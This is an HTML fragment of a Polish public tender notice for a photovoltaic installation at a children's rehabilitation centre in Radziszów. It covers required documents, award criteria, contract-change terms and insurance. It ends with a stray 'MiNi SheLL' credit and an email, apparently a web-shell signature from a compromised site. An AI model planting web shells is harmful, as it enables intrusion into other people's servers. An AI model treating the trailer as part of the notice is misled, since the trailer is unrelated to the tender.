</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane roboty budowlane spełniają wymogi zamawiającego, Wykonawca składa wraz z ofertą:
1)	karty katalogowe/karty charakterystyki dla
- modułu PVT
- inwerterów
- kolektorów słonecznych
2)	certyfikat akredytowanej jednostki badawczo certyfikującej dla elementów fotowoltaicznych, potwierdzający ich zgodność z obowiązującymi normami.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Koszty serwisu po okresie gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach: 
1) zmiany osób uczestniczących w wykonywaniu zamówienia po stronie Wykonawcy i osób nadzorujących wykonanie zamówienia po stronie Zamawiającego,
2) aktualizacji, zmiany rozwiązań z uwagi na postęp techniczny lub zmiany obowiązujących przepisów techniczno-budowlanych, lub z innych uzasadnionych powodów
3) elementów fotowoltaicznych lub ich instalacji,
4) przeszkód technicznych uniemożliwiających zastosowanie przyjętych w SIWZ lub ofercie rozwiązań, w szczególności wycofania danego urządzenia z produkcji i zastąpienia go modelem nowszym, z zastrzeżeniem, że wartość wynagrodzenia wykonawcy nie może ulec zwiększeniu
5) zmian regulacji prawnych obowiązujących w dniu zawarcia umowy, 
6) wystąpienia konieczności zmiany podwykonawcy dla części zamówienia, którą wykonawca wskazał w ofercie, że powierzy ją do wykonania podwykonawcy, za zgodą Zamawiającego i z zachowaniem zasad dotyczących podwykonawców określonych we wzorze umowy, 
7) w szczególnie uzasadnionym przypadku wystąpienia konieczności realizacji przez podwykonawcę części zamówienia, której wykonawca nie wskazał w ofercie, że powierzy ją do wykonania podwykonawcy, za zgodą Zamawiającego i z zachowaniem zasad dotyczących podwykonawców określonych we wzorze umowy, 
8)  wydłużenia terminu wykonania zamówienia z uwagi na : 
- wyjątkowo niesprzyjających warunkach pogodowych 
- przedłużające się procedury administracyjne 
- innych okoliczności niezależnych od Wykonawcy pod warunkiem wyrażenia zgody przez Zamawiającego, termin może ulec przedłużeniu o czas trwania tych okoliczności,
    9) zmiany urzędowej stawki podatku VAT
2. W ciągu 10 dni od chwili uświadomienia sobie, że może wystąpić opóźnienie Wykonawca powiadomi Zamawiającego o zamiarze ubiegania się o przedłużenia terminu wykonania, do czego Wykonawca może uważać się upoważniony i następnie dostarczy Zamawiającemu tak szybko jak to uzasadnione w danych okolicznościach - wyczerpujące i szczegółowe uzasadnienie wniosku, aby mógł on być przeanalizowany w terminie. 
3. Zamawiający przyzna takie przedłużenie terminu wykonania jakie może być uzasadnione, albo powiadomi Wykonawcę, że nie przysługuje mu prawo do przedłużenia terminu wykonania umowy.
4. Wykonawca będzie zobowiązany do ubezpieczenia budowy w zakresie wszystkich ryzyk (wszelkich szkód i strat materialnych polegających na utracie, uszkodzeniu lub zniszczeniu mienia), a także od odpowiedzialności cywilnej i następstw nieszczęśliwych wypadków, które mogą powstać w związku z prowadzonymi robotami budowlanymi, w tym - z ruchem pojazdów mechanicznych, na terenie prac lub w jego sąsiedztwie. Suma ubezpieczenia będzie nie niższa niż pełna wartość robót wynikająca z oferty wykonawcy. Dla ubezpieczenia odpowiedzialności cywilnej suma gwarancyjna musi odpowiadać wysokości możliwych roszczeń z tytułu potencjalnych szkód (na mieniu lub osobie), jakie mogą powstać w związku z realizacją robót i nie powinna być niższa niż 30 % wartości robót (umowy).
5. Umowa ubezpieczenia musi gwarantować odpowiedzialność do pełnej sumy gwarancyjnej na jedno i wszystkie zdarzenia w okresie ubezpieczenia:
1.	w zakresie odpowiedzialności ogólnej (deliktowej i kontraktowej);
2.	za szkody z tytułu niewykonania lub nienależytego wykonania umowy;
3.	za szkody wyrządzone przez podwykonawców,
4.	za szkody wyrządzone pojazdami niepodlegającymi ubezpieczeniu obowiązkowemu;
5.	za szkody wyrządzone w instalacjach;
6.	za szkody w postaci czystych strat finansowych.
6. Wykonawca zapewni ciągłość ubezpieczenia przez cały okres realizacji umowy, t.j. przynajmniej do dnia podpisania przez strony protokołu odbioru końcowego. W tym celu Wykonawca przedłoży Zamawiającemu ważną polisę ubezpieczenia, w ciągu 5 dni od daty podpisania umowy, zaś ewentualne kolejne polisy, Wykonawca będzie przedstawiał Zamawiającemu w ciągu 7 dni od zakończenia ważności poprzedniej polisy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mcrd.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolskie Centrum Rehabilitacji Dzieci Solidarność w Radziszowie 
32-052 Radziszów, ul. Podlesie 173.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2015 godzina 10:00, miejsce: Małopolskie Centrum Rehabilitacji Dzieci Solidarność w Radziszowie 
32-052 Radziszów, ul. Podlesie 173
Sekretariat Dyrekcji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com